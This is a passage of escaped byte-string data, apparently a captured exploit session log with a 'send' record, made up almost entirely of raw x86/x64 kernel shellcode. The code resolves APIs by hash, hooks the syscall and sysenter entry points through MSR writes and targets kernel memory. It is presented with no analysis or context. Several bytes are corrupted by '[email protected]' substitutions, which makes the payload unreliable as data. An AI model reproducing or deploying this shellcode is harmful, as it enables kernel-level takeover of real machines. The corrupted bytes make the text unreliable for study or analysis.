x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xeb\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\[email\u00a0protected]\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\[email\u00a0protected]\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\[email\u00a0protected]\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\[email\u00a0protected]<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\[email\u00a0protected]\\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\[email\u00a0protected]\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 4, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\[email\u00a0protected]\\\\x90t\\\\x08\\\\xe8\\\\t\\\\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea \\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\[email\u00a0protected]\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\[email\u00a0protected]\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xee